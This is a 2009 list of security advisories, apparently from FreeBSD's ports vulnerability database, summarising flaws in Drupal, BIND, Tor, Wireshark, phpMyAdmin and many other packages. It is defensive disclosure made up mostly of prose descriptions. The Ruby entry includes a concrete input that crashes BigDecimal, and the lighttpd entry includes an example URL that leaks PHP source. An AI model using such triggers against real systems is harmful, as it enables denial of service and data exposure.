| 2009-08-04 | SILC changelog reports: An unspecified format string vulnerability exists in silc-client. more... | silc-client silc-irssi-client |
| 2009-08-04* | Problem Description: When named(8) receives a specially crafted dynamic update message an internal assertion check is triggered which causes named(8) to exit. To trigger the problem, the dynamic update message must contain a record of type "ANY" and at least one resource record set (RRset) for this fully qualified domain name (FQDN) must exist on the server. Impact: An attacker which can send DNS requests to a nameserver can cause it to exit, thus creating a Denial of Service situation. Workaround: No generally applicable workaround is available, but some firewalls may be able to prevent nsupdate DNS packets from reaching the nameserver. NOTE WELL: Merely configuring named(8) to ignore dynamic updates is NOT sufficient to protect it from this vulnerability. more... | bind9 bind9-sdb-ldap bind9-sdb-postgresql |
| 2009-08-02 | Problem Description: The SquirrelMail Web Server has been compromised, and three plugins are affected. The port of squirrelmail-sasql-plugin is safe (right MD5), and change_pass is not in the FreeBSD ports tree, but multilogin has a wrong MD5. more... | squirrelmail-multilogin-plugin |
| 2009-07-29 | Secunia reports: A security issue has been reported in Mono, which can be exploited by malicious people to conduct spoofing attacks. The security issue is caused due to an error when processing certain XML signatures. more... | mono |
| 2009-07-21* | US-CERT reports: The ISC DHCP dhclient application contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code with root privileges. more... | isc-dhcp30-client isc-dhcp31-client |
| 2009-07-13* | The Drupal Security Team reports: Cross-site scripting: The Forum module does not correctly handle certain arguments obtained from the URL. By enticing a suitably privileged user to visit a specially crafted URL, a malicious user is able to insert arbitrary HTML and script code into forum pages. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. Wikipedia has more information about cross-site scripting (XSS). Input format bypass: User signatures have no separate input format, they use the format of the comment with which they are displayed. A user will no longer be able to edit a comment when an administrator changes the comment's input format to a format that is not accessible to the user. However they will still be able to modify their signature, which will then be processed by the new input format. If the new format is very permissive, via their signature, the user may be able to insert arbitrary HTML and script code into pages or, when the PHP filter is enabled for the new format, execute PHP code. This issue affects Drupal 6.x only. Password leakage: When an anonymous user fails to login due to mistyping his username or password, and the page he is on contains a sortable table, the (incorrect) username and password are included in links on the table. If the user visits these links the password may then be leaked to external sites via the HTTP referer. In addition, if the anonymous user is enticed to visit the site via a specially crafted URL while the Drupal page cache is enabled, a malicious user might be able to retrieve the (incorrect) username and password from the page cache. more... | drupal5 drupal6 |
| 2009-07-13* | Secunia reports: A vulnerability has been reported in Nagios, which can be exploited by malicious users to potentially compromise a vulnerable system. Input passed to the "ping" parameter in statuswml.cgi is not properly sanitised before being used to invoke the ping command. This can be exploited to inject and execute arbitrary shell commands. Successful exploitation requires access to the ping feature of the WAP interface. more... | nagios nagios-devel nagios2 |
| 2009-07-03 | nfsen reports: Due to double input checking, a remote command execution security bug exists in all NfSen versions 1.3 and 1.3.1. Users are requested to update to nfsen-1.3.2. more... | nfsen |
| 2009-07-01* | Florian Grandel reports: I have not had the time to analyze all of syslog-ng code. But by reading the code section near the chroot call and looking at strace results I believe that syslog-ng does not chdir to the chroot jail's location before chrooting into it. This opens up ways to work around the chroot jail. more... | syslog-ng syslog-ng2 |
| 2009-06-30 | The phpMyAdmin project reports: It was possible to conduct an XSS attack via a crafted SQL bookmark. All 3.x releases on which the "bookmarks" feature is active are affected, previous versions are not. more... | phpMyAdmin |
| 2009-06-23 | The Tor Project reports: A malicious exit relay could convince a controller that the client's DNS question resolves to an internal IP address. more... | tor-devel |
| 2009-06-23* | Secunia reports: A vulnerability with an unknown impact has been reported in Tor. The vulnerability is caused due to an unspecified error and can be exploited to trigger a heap corruption. No further information is currently available. more... | tor tor-devel |
| 2009-06-16 | Secunia reports: Some vulnerabilities have been reported in Cscope, which potentially can be exploited by malicious people to compromise a user's system. The vulnerabilities are caused due to various boundary errors, which can be exploited to cause buffer overflows when parsing specially crafted files or directories. more... | cscope |
| 2009-06-16 | SecurityFocus reports: Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. more... | cscope |
| 2009-06-16 | Secunia reports: Some vulnerabilities have been reported in Joomla!, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site when the malicious data is displayed. Certain unspecified input passed to the user view of the com_users core component is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed via certain parameters to the "JA_Purity" template is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | joomla15 |
| 2009-06-16 | Secunia reports: Some vulnerabilities and weaknesses have been reported in Pidgin, which can be exploited by malicious people to cause a DoS or to potentially compromise a user's system. A truncation error in the processing of MSN SLP messages can be exploited to cause a buffer overflow. A boundary error in the XMPP SOCKS5 "bytestream" server when initiating an outgoing file transfer can be exploited to cause a buffer overflow. A boundary error exists in the implementation of the "PurpleCircBuffer" structure. This can be exploited to corrupt memory and cause a crash via specially crafted XMPP or Sametime packets. A boundary error in the "decrypt_out()" function can be exploited to cause a stack-based buffer overflow with 8 bytes and crash the application via a specially crafted QQ packet. more... | finch libpurple pidgin |
| 2009-06-15 | SecurityFocus reports: Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests. Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial of service condition. more... | git |
| 2009-06-13* | The official ruby site reports: A denial of service (DoS) vulnerability was found on the BigDecimal standard library of Ruby. Conversion from BigDecimal objects into Float numbers had a problem which enables attackers to effectively cause segmentation faults. An attacker can cause a denial of service by causing BigDecimal to parse an insanely large number, such as: BigDecimal("9E69999999").to_s("F") more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-06-08 | Secunia reports: Some vulnerabilities have been reported in APR-util, which can be exploited by malicious users and malicious people to cause a DoS (Denial of Service). A vulnerability is caused due to an error in the processing of XML files and can be exploited to exhaust all available memory via a specially crafted XML file containing a predefined entity inside an entity definition. A vulnerability is caused due to an error within the "apr_strmatch_precompile()" function in strmatch/apr_strmatch.c, which can be exploited to crash an application using the library. RedHat reports: A single NULL byte buffer overflow flaw was found in apr-util's apr_brigade_vprintf() function. more... | apache apr |
| 2009-06-04 | DokuWiki reports: A security hole was discovered which allows an attacker to include arbitrary files located on the attacked DokuWiki installation. The included file is executed in the PHP context. This can be escalated by introducing malicious code through uploading file via the media manager or placing PHP code in editable pages. more... | dokuwiki dokuwiki-devel |
| 2009-05-30 | Secunia reports: The vulnerability is caused due to an error in the processing of private messages within the server module (/mod/server.mod/servrmsg.c). This can be exploited to cause a crash by sending a specially crafted message to the bot. more... | eggdrop |
| 2009-05-30 | Secunia reports: A vulnerability has been reported in Wireshark, which can be exploited by malicious people to cause a DoS. The vulnerability is caused due to an error in the PCNFSD dissector and can be exploited to cause a crash via a specially crafted PCNFSD packet. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-05-30 | Secunia reports: Two vulnerabilities have been reported in libsndfile, which can be exploited by malicious people to compromise an application using the library. A boundary error exists within the "voc_read_header()" function in src/voc.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted VOC file. A boundary error exists within the "aiff_read_header()" function in src/aiff.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted AIFF file. more... | libsndfile |
| 2009-05-30 | Secunia reports: A security issue has been reported in SLiM, which can be exploited by malicious, local users to disclose sensitive information. The security issue is caused due to the application generating the X authority file by passing the X authority cookie via the command line to "xauth". This can be exploited to disclose the X authority cookie by consulting the process list and e.g. gain access to the user's display. more... | slim |
| 2009-05-22* | SecurityFocus reports: University of Washington IMAP c-client is prone to a remote format-string vulnerability because the software fails to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function. more... | imap-uw |
| 2009-05-22* | NLnet Labs: A one-byte buffer overflow has been reported in NSD. The problem affects all versions 2.0.0 to 3.2.1. The bug allows a carefully crafted exploit to bring down your DNS server. It is highly unlikely that this one byte overflow can lead to other (system) exploits. more... | nsd nsd2 |
| 2009-05-20 | US-CERT reports: ntpd contains a stack buffer overflow which may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system or create a denial of service. more... | ntp |
| 2009-05-17 | xine developers report: Fix another possible int overflow in the 4XM demuxer. (ref. TKADV2009-004, CVE-2009-0385) Fix an integer overflow in the Quicktime demuxer. more... | libxine |
| 2009-05-17 | Multiple vulnerabilities were fixed in libxine 1.1.16.2. Tobias Klein reports: FFmpeg contains a type conversion vulnerability while parsing malformed 4X movie files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of FFmpeg or an application using the FFmpeg library. Note: A similar issue also affects xine-lib < version 1.1.16.2. xine developers report: Fix broken size checks in various input plugins (ref. CVE-2008-5239). More malloc checking (ref. CVE-2008-5240). more... | libxine |
| 2009-05-16 | SecurityFocus research reports: A bug that leads to the emptying of the INI file contents if the database key was not found exists in the PHP dba extension in versions 5.2.6, 4.4.9 and earlier. The dba_replace() function does not filter the key and value strings. There is a possibility of destruction of the file. more... | php4-dba php5-dba |
| 2009-05-16 | Secunia reports: A vulnerability has been reported in libwmf, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise an application using the library. The vulnerability is caused due to a use-after-free error within the embedded GD library, which can be exploited to cause a crash or potentially to execute arbitrary code via a specially crafted WMF file. more... | libwmf |
| 2009-05-16 | Secunia reports: infamous41md has reported a vulnerability in libwmf, which potentially can be exploited by malicious people to compromise an application using the vulnerable library. The vulnerability is caused due to an integer overflow error when allocating memory based on a value taken directly from a WMF file without performing any checks. This can be exploited to cause a heap-based buffer overflow when a specially crafted WMF file is processed. more... | libwmf |
| 2009-05-16 | Secunia reports: Input passed via multiple parameters to action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-05-16* | Secunia reports: Certain input passed to the "Apache::Status" and "Apache2::Status" modules is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website. more... | mod_perl mod_perl2 |
| 2009-05-16* | The Drupal Security Team reports: When outputting user-supplied data Drupal strips potentially dangerous HTML attributes and tags or escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are valid in the UTF-8 specification are potentially dangerous when interpreted as UTF-7. Internet Explorer 6 and 7 may decode these characters as UTF-7 if they appear before the tag that specifies the page content as UTF-8, despite the fact that Drupal also sends a real HTTP header specifying the content as UTF-8. This enables attackers to execute cross site scripting attacks with UTF-7. SA-CORE-2009-005 - Drupal core - Cross site scripting contained an incomplete fix for the issue. HTML exports of books are still vulnerable, which means that anyone with edit permissions for pages in outlines is able to insert arbitrary HTML and script code in these exports. Additionally, the taxonomy module allows users with the 'administer taxonomy' permission to inject arbitrary HTML and script code in the help text of any vocabulary. more... | drupal5 drupal6 |
| 2009-05-15 | US-CERT reports: The sasl_encode64() function converts a string into base64. The Cyrus SASL library contains buffer overflows that occur because of unsafe use of the sasl_encode64() function. more... | cyrus-sasl |
| 2009-05-13 | Secunia reports: Some vulnerabilities have been reported in MoinMoin, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to multiple parameters in action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Certain input passed to security/antispam.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-05-13 | SecurityFocus reports: Ghostscript is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into a finite-sized buffer. Exploiting this issue allows remote attackers to overwrite a sensitive memory buffer with arbitrary data, potentially allowing them to execute malicious machine code in the context of the affected application. This vulnerability may facilitate the compromise of affected computers. more... | ghostscript8 ghostscript8-nox11 |
| 2009-05-13* | Wireshark team reports: Wireshark 1.0.7 fixes the following vulnerabilities: The PROFINET dissector was vulnerable to a format string overflow. (Bug 3382) Versions affected: 0.99.6 to 1.0.6, CVE-2009-1210. The Check Point High-Availability Protocol (CPHAP) dissector could crash. (Bug 3269) Versions affected: 0.9.6 to 1.0.6; CVE-2009-1268. Wireshark could crash while loading a Tektronix .rf5 file. (Bug 3366) Versions affected: 0.99.6 to 1.0.6, CVE-2009-1269. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-05-13* | Gentoo security team summarizes: The following issues were reported in CUPS: iDefense reported an integer overflow in the _cupsImageReadTIFF() function in the "imagetops" filter, leading to a heap-based buffer overflow (CVE-2009-0163). Aaron Siegel of Apple Product Security reported that the CUPS web interface does not verify the content of the "Host" HTTP header properly (CVE-2009-0164). Braden Thomas and Drew Yao of Apple Product Security reported that CUPS is vulnerable to CVE-2009-0146, CVE-2009-0147 and CVE-2009-0166, found earlier in xpdf and poppler. A remote attacker might send or entice a user to send a specially crafted print job to CUPS, possibly resulting in the execution of arbitrary code with the privileges of the configured CUPS user -- by default this is "lp", or a Denial of Service. Furthermore, the web interface could be used to conduct DNS rebinding attacks. more... | cups-base |
| 2009-05-13* | Secunia reports: A vulnerability has been reported in Openfire which can be exploited by malicious users to bypass certain security restrictions. The vulnerability is caused due to Openfire not properly respecting the no password changes setting which can be exploited to change passwords by sending jabber:iq:auth passwd_change requests to the server. more... | openfire |
| 2009-05-07* | Debian Security Team reports: It was discovered that Quagga, an IP routing daemon, could no longer process the Internet routing table due to broken handling of multiple 4-byte AS numbers in an AS path. If such a prefix is received, the BGP daemon crashes with an assert failure leading to a denial of service. more... | quagga |
| 2009-04-30 | Drupal Security Team reports: When outputting user-supplied data Drupal strips potentially dangerous HTML attributes and tags or escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are valid in the UTF-8 specification are potentially dangerous when interpreted as UTF-7. Internet Explorer 6 and 7 may decode these characters as UTF-7 if they appear before the meta http-equiv="Content-Type" tag that specifies the page content as UTF-8, despite the fact that Drupal also sends a real HTTP header specifying the content as UTF-8. This behaviour enables malicious users to insert and execute Javascript in the context of the website if site visitors are allowed to post content. In addition, Drupal core also has a very limited information disclosure vulnerability under very specific conditions. If a user is tricked into visiting the site via a specially crafted URL and then submits a form (such as the search box) from that page, the information in their form submission may be directed to a third-party site determined by the URL and thus disclosed to the third party. The third party site may then execute a CSRF attack against the submitted form. more... | drupal5 drupal6 |
| 2009-04-29* | The KDE Team reports: kpdf, the KDE pdf viewer, shares code with xpdf. xpdf contains a vulnerability that can cause a stack based buffer overflow via a PDF file that exploits an integer overflow in StreamPredictor::StreamPredictor(). Remotely supplied pdf files can be used to disrupt the kpdf viewer on the client machine and possibly execute arbitrary code. more... | cups-base gpdf kdegraphics pdftohtml poppler xpdf |
| 2009-04-18 | Secunia reports: Some vulnerabilities have been reported in Poppler which can be exploited by malicious people to potentially compromise an application using the library. more... | poppler |
| 2009-04-18* | Secunia reports: Some vulnerabilities have been reported in Xpdf, which can be exploited by malicious people to potentially compromise a user's system. A boundary error exists when decoding JBIG2 symbol dictionary segments. This can be exploited to cause a heap-based buffer overflow and potentially execute arbitrary code. Multiple integer overflows in the JBIG2 decoder can be exploited to potentially execute arbitrary code. Multiple boundary errors in the JBIG2 decoder can be exploited to cause buffer overflows and potentially execute arbitrary code. Multiple errors in the JBIG2 decoder can be exploited to free arbitrary memory and potentially execute arbitrary code. Multiple unspecified input validation errors in the JBIG2 decoder can be exploited to potentially execute arbitrary code. more... | xpdf |
| 2009-04-18 | Secunia reports: Some vulnerabilities have been reported in FreeType, which can be exploited by malicious people to potentially compromise an application using the library. An integer overflow error within the "cff_charset_compute_cids()" function in cff/cffload.c can be exploited to potentially cause a heap-based buffer overflow via a specially crafted font. Multiple integer overflow errors within validation functions in sfnt/ttcmap.c can be exploited to bypass length validations and potentially cause buffer overflows via specially crafted fonts. An integer overflow error within the "ft_smooth_render_generic()" function in smooth/ftsmooth.c can be exploited to potentially cause a heap-based buffer overflow via a specially crafted font. more... | freetype2 |
| 2009-04-17 | SecurityFocus reports: The ejabberd application is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. more... | ejabberd |
| 2009-04-15 | Ziproxy Developers report: Multiple HTTP proxy implementations are prone to an information-disclosure vulnerability related to the interpretation of the 'Host' HTTP header. Specifically, this issue occurs when the proxy makes a forwarding decision based on the 'Host' HTTP header instead of the destination IP address. Attackers may exploit this issue to obtain sensitive information such as internal intranet webpages. Additional attacks may also be possible. more... | ziproxy |
| 2009-04-15 | phpMyAdmin Team reports: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. This issue is on different parameters than PMASA-2009-3 and it was missed out of our radar because it was not existing in 2.11.x branch. more... | phpMyAdmin |
| 2009-04-11 | Drupal CCK plugin developer reports: The Node reference and User reference sub-modules, which are part of the Content Construction Kit (CCK) project, let administrators define node fields that are references to other nodes or to users. When displaying a node edit form, the titles of candidate referenced nodes or names of candidate referenced users are not properly filtered, allowing malicious users to inject arbitrary code on those pages. Such a cross site scripting (XSS) attack may lead to a malicious user gaining full administrative access. more... | drupal6-cck |
| 2009-03-27 | Secunia reports: A vulnerability has been discovered in Pivot, which can be exploited by malicious people to delete certain files. Input passed to the "refkey" parameter in extensions/bbclone_tools/count.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the "refkey" parameter. NOTE: Users with the "Advanced" user level are able to include and execute uploaded PHP code via the "pivot_path" parameter in extensions/bbclone_tools/getkey.php when extensions/bbclone_tools/hr_conf.php can be deleted. more... | pivot-weblog |
| 2009-03-26* | Secunia reports: Some vulnerabilities have been reported in RoundCube Webmail, which can be exploited by malicious users to compromise a vulnerable system and by malicious people to conduct script insertion attacks and compromise a vulnerable system. The HTML "background" attribute within e.g. HTML emails is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if a malicious email is viewed. Input passed via a vCard is not properly sanitised before being used in a call to "preg_replace()" with the "e" modifier in program/include/rcube_vcard.php. This can be exploited to inject and execute arbitrary PHP code by e.g. tricking a user into importing a malicious vCard file. more... | roundcube |
| 2009-03-25 | phpMyAdmin reports: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. more... | phpMyAdmin phpMyAdmin211 |
| 2009-03-23 | Secunia reports: Tobias Klein has reported some vulnerabilities in Amarok, which potentially can be exploited by malicious people to compromise a user's system. Two integer overflow errors exist within the "Audible::Tag::readTag()" function in src/metadata/audible/audibletag.cpp. These can be exploited to cause heap-based buffer overflows via specially crafted Audible Audio files. Two errors within the "Audible::Tag::readTag()" function in src/metadata/audible/audibletag.cpp can be exploited to corrupt arbitrary memory via specially crafted Audible Audio files. more... | amarok |
| 2009-03-23* | Vendor reports: On non-Windows systems Wireshark could crash if the HOME environment variable contained sprintf-style string formatting characters. Wireshark could crash while reading a malformed NetScreen snoop file. Wireshark could crash while reading a Tektronix K12 text capture file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-03-23* | Secunia reports: Some vulnerabilities have been reported in the ZABBIX PHP frontend, which can be exploited by malicious people to conduct cross-site request forgery attacks and malicious users to disclose sensitive information and compromise a vulnerable system. Input appended to and passed via the "extlang" parameter to the "calc_exp2()" function in include/validate.inc.php is not properly sanitised before being used. This can be exploited to inject and execute arbitrary PHP code. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create users by enticing a logged in administrator to visit a malicious web page. Input passed to the "srclang" parameter in locales.php (when "next" is set to a non-NULL value) is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes. more... | zabbix zabbix-agent |
| 2009-03-23* | Wes Hardaker reports through sourceforge.net forum: SECURITY ISSUE: A bug in the getbulk handling code could let anyone with even minimal access crash the agent. If you have open access to your snmp agents (bad bad bad; stop doing that!) or if you don't trust everyone that does have access to your agents you should update immediately to prevent potential denial of service attacks. Description at cve.mitre.org additionally clarifies: Integer overflow in the netsnmp_create_subtree_cache function in agent/snmp_agent.c in net-snmp 5.4 before 5.4.2.1, 5.3 before 5.3.2.3, and 5.2 before 5.2.5.1 allows remote attackers to cause a denial of service (crash) via a crafted SNMP GETBULK request, which triggers a heap-based buffer overflow, related to the number of responses or repeats. more... | net-snmp |
| 2009-03-23* | Jonathan Weiss reports that it is possible to perform an SQL injection in Rails applications via incorrectly sanitized :limit and :offset parameters. It is possible to change arbitrary values in affected tables or gain access to sensitive data. more... | rubygem-rails |
| 2009-03-22* | The Zope Team reports: A vulnerability has been discovered in Zope, whereby certain types of misuse of HTTP GET could allow an attacker to gain elevated privileges. All Zope versions up to and including 2.10.2 are affected. more... | plone zope |
| 2009-03-20* | Secunia reports: Some vulnerabilities have been reported in Tor, where one has an unknown impact and others can be exploited by malicious people to cause a DoS. An error when running Tor as a directory authority can be exploited to trigger the execution of an infinite loop. An unspecified error exists when running on Windows systems prior to Windows XP. No further information is currently available. more... | tor tor-devel |
| 2009-03-18* | Secunia reports: A vulnerability has been reported in Netatalk, which potentially can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to the papd daemon improperly sanitising several received parameters before passing them in a call to popen(). This can be exploited to execute arbitrary commands via a specially crafted printing request. Successful exploitation requires that a printer is configured to pass arbitrary values as parameters to a piped command. more... | netatalk |
| 2009-03-16 | Secunia reports: Tobias Klein has reported some vulnerabilities in GStreamer Good Plug-ins, which can potentially be exploited by malicious people to compromise a vulnerable system. A boundary error occurs within the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "ctts" Atom parsing. This can be exploited to cause a heap-based buffer overflow via a specially crafted QuickTime media file. An array indexing error exists in the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "stss" Atom parsing. This can be exploited to corrupt memory via a specially crafted QuickTime media file. A boundary error occurs within the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "stts" Atom parsing. This can be exploited to cause a heap-based buffer overflow via a specially crafted QuickTime media file. more... | gstreamer-plugins-good |
| 2009-03-16 | Secunia reports: The vulnerability is caused due to an integer overflow error in the processing of CAF description chunks. This can be exploited to cause a heap-based buffer overflow by tricking the user into processing a specially crafted CAF audio file. more... | libsndfile |
| 2009-03-16 | Secunia reports: Tobias Klein has reported a vulnerability in FFmpeg, which potentially can be exploited by malicious people to compromise an application using the library. The vulnerability is caused due to a signedness error within the "fourxm_read_header()" function in libavformat/4xm.c. This can be exploited to corrupt arbitrary memory via a specially crafted 4xm file. more... | ffmpeg |
| 2009-03-16 | Secunia reports: Some vulnerabilities have been reported in ProFTPD, which can be exploited by malicious people to conduct SQL injection attacks. The application improperly sets the character encoding prior to performing SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in an environment using a multi-byte character encoding. An error exists in the "mod_sql" module when processing e.g. user names containing '%' characters. This can be exploited to bypass input sanitation routines and manipulate SQL queries by injecting arbitrary SQL code. more... | proftpd proftpd-devel proftpd-mysql |
| 2009-03-16 | SecurityFocus reports: PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. The issue affects the 'mbstring' extension included in the standard distribution. An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users. more... | php4-mbstring php5-mbstring |
| 2009-03-16 | Secunia reports: Dun has discovered a vulnerability in phpPgAdmin, which can be exploited by malicious people to disclose sensitive information. Input passed via the "_language" parameter to libraries/lib.inc.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes. more... | phppgadmin |
| 2009-03-15 | Opera Team reports: An unspecified error in the processing of JPEG images can be exploited to trigger a memory corruption. An error can be exploited to execute arbitrary script code in a different domain via unspecified plugins. An unspecified error has a "moderately severe" impact. No further information is available. more... | linux-opera opera |
| 2009-03-11 | CVE Mitre reports: Untrusted search path vulnerability in the Python interface in Epiphany 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983). more... | epiphany |
| 2009-03-11 | CVE Mitre reports: Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI. more... | apache |
| 2009-03-04 | Secunia reports: A vulnerability has been reported in Pngcrush, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libpng code. more... | pngcrush |
| 2009-03-04 | Secunia reports: The security issue is caused due to cURL following HTTP Location: redirects to e.g. scp:// or file:// URLs which can be exploited by a malicious HTTP server to overwrite or disclose the content of arbitrary local files and potentially execute arbitrary commands via specially crafted redirect URLs. more... | curl |
| 2009-02-22* | Lighttpd security announcement: lighttpd 1.4.19, and possibly other versions before 1.5.0, does not decode the URL before matching against rewrite and redirect patterns, which allows attackers to bypass rewrite rules. This can be a security problem in certain configurations if these rules are used to hide certain URLs. lighttpd 1.4.19, and possibly other versions before 1.5.0, does not lowercase the filename after generating it from the URL in mod_userdir on case-insensitive (file)systems. As other modules are case sensitive, this may lead to information disclosure; for example, if one configured PHP to handle files ending in ".php", an attacker will get the PHP source with http://example.com/~user/file.PHP. lighttpd 1.4.19 does not always release a header if it triggered a 400 (Bad Request) due to a duplicate header. more... | lighttpd |
| 2009-02-18 | Matthew Weier O'Phinney reports: A potential Local File Inclusion (LFI) vulnerability exists in the Zend_View::render() method. If user input is used to specify the script path, then it is possible to trigger the LFI. Note that Zend Framework applications that never call the Zend_View::render() method with a user-supplied parameter are not affected by this vulnerability. more... | ZendFramework |
| 2009-02-17 | Security Focus reports: An attacker could exploit this issue by enticing an unsuspecting victim to execute the vulnerable application in a directory containing a malicious Python file. A successful exploit will allow arbitrary Python commands to run within the privileges of the currently logged-in user. more... | dia |
| 2009-02-15 | Dwayne C. Litzenberger reports: pycrypto is exposed to a buffer overflow issue because it fails to adequately verify user-supplied input. This issue resides in the ARC2 module. This issue can be triggered with specially crafted ARC2 keys in excess of 128 bytes. more... | py-pycrypto |
| 2009-02-15* | SecurityFocus reports: Varnish is prone to a remote denial-of-service vulnerability because the application fails to handle certain HTTP requests. Successfully exploiting this issue allows remote attackers to crash the affected application denying further service to legitimate users. more... | varnish |
| 2009-02-11 | znirkel reports: The eval() function in _reset_post_array crashes when posting certain data. By passing in carefully-crafted input data, the eval() function could also execute malicious PHP code. Note that CodeIgniter applications that either do not use the new Form Validation class or use the old Validation class are not affected by this vulnerability. more... | codeigniter |
| 2009-02-11 | Security Focus reports: PyBlosxom is prone to multiple XML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. more... | pyblosxom |
| 2009-02-11 | Secunia reports: Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose sensitive information. Input passed via unspecified fields to the backend user interface is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. An error in the "jumpUrl" mechanism can be exploited to read arbitrary files from local resources by disclosing a hash secret used to restrict file access. more... | typo3 |
| 2009-02-10* | Squid security advisory 2009:1 reports: Due to an internal error Squid is vulnerable to a denial of service attack when processing specially crafted requests. This problem allows any client to perform a denial of service attack on the Squid service. more... | squid |
| 2009-02-09 | Secunia reports: A boundary error when processing "div" HTML tags can be exploited to cause a stack-based buffer overflow via an overly long "id" parameter. A boundary error exists when processing overly long links. This can be exploited to cause a stack-based buffer overflow by tricking the user into e.g. editing a malicious link. A boundary error when processing e.g. a "bdo" HTML tag having an overly long "dir" attribute can be exploited to cause a stack-based buffer overflow. A boundary error when processing "input" HTML tags can be exploited to cause a stack-based buffer overflow via an overly long e.g. "type" attribute. more... | amaya |
| 2009-02-09 | Secunia reports: Some vulnerabilities have been reported in WebSVN, which can be exploited by malicious users to disclose sensitive information, and by malicious people to conduct cross-site scripting attacks and manipulate data. Input passed in the URL to index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed to the "rev" parameter in rss.php is not properly sanitised before being used. This can be exploited to overwrite arbitrary files via directory traversal attacks. Access to restricted repositories is not properly enforced, which can be exploited to disclose potentially sensitive information by accessing the repository via "listing.php" and using the "compare with previous" and "show changed files" links. more... | websvn |
| 2009-02-09 | Secunia reports: Input passed to the "_SERVER[ConfigFile]" parameter in admin/index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. more... | phplist |
